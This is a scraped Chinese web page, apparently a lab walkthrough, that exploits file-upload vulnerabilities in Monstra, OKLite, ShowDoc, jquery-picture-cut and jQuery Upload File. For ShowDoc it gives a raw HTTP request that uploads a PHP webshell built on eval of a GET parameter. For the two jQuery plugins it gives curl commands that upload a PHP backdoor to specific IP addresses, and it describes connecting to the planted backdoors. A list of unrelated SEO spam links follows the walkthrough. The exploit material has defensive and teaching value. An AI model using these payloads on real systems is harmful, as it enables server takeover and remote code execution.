当前位置: 首页 > wzjs >正文

深圳做app网站公司零基础学seo要多久

wzjs 2025/8/4 7:06:18
深圳做app网站公司,零基础学seo要多久,sjz住房建设局网站,wordpress单用户商城monstra 文件上传 (CVE-2020-13384) Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代…

monstra 文件上传 (CVE-2020-13384)

Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。

打开页面 安装好页面进行登录

登录后台 

上传文件  这里说能上传的特殊文件后缀是phar的后缀文件

上传成功后直接命令执行

oklite 文件上传 (CVE-2019-16131)

锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。 锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。攻击者可利用该漏洞上传任意文件。

登录后台 输入弱口令 进行一下操作 上传test.zip 里面存在有test.php后门


后门解析路径 /data/cache/test.php  进行连接 连接成功

showdoc 文件上传 (cnvd-2020-26585)

ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。 api_page存在任意文件上传.

打开界面

直接使用POC上传文件,直接上传成功

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain<?php echo 'hello!!!';@eval($_GET['cmd'])?>
----------------------------921378126371623762173617--

使用命令681daa78559a9.php?cmd=phpinfo(); 查看phpinfo()

 jquery-picture-cut 任意文件上传 (CVE-2018-9208)

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

直接使用poc

curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@1.php" http://219.131.59.213:43188/jquery-picture-cut/src/php/upload.php

上传成功 并成功连接后门

jquery 文件上传 (CVE-2018-9207)

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

打开页面

这里也直接用poc进行上传文件

curl -F "myfile=@1.php" "http://219.131.59.213:22267/jquery-upload-file/php/upload.php"

连接成功 

http://www.dtcms.com/wzjs/212680.html

相关文章:

  • wordpress添加媒体上海seo搜索优化
  • 个人网站变现com天堂网
  • 做瞹瞹瞹视频网站比较好网站制作公司
  • 龙岗网站建设_公司推广google官网
  • django做网站和js做网站sem是什么检测分析
  • 最经济 网站建设怎么样才能引流客人进店
  • video.js wordpress搜索关键词排名优化服务
  • 站群系统开发关键词排名是什么意思
  • 湖州网站建设策划推广产品的渠道
  • 免费设计软件网站公司网站建设服务机构
  • 专做展厅设计网站网络运营怎么做
  • 网站的用户注册怎么做怎么搭建属于自己的网站
  • 晋中北京网站建设深圳网络推广渠道
  • 哪些网站可以做设计方案广州百度seo公司
  • 网站建设招聘要求网站有吗免费的
  • 颍州网站建设竞价网络推广
  • 云服务器和网站空间谷歌推广公司
  • 仙桃做网站的个人seo还有前景吗
  • 网站建设 系统维护郑州网站推广培训
  • 公司微网站怎么建设百度推广登录入口官网网址
  • 新品发布会活动方案免费seo
  • 宜昌网站制作公司网络营销研究现状文献综述
  • 制作视频网站违法吗简述seo的概念
  • 如何做简单的网站招聘网络营销推广人员
  • 网站建设方案书制作流程宝安网站建设
  • 在线网站建设者西安外包公司排行
  • 临猗县 保障住房和建设住建网站快速关键词排名首页
  • 手机高端网站建设推广竞价账户托管
  • 帝国cms做下载网站爱站网站长seo综合查询工具
  • wordpress密码访问插件seo快速排名优化方式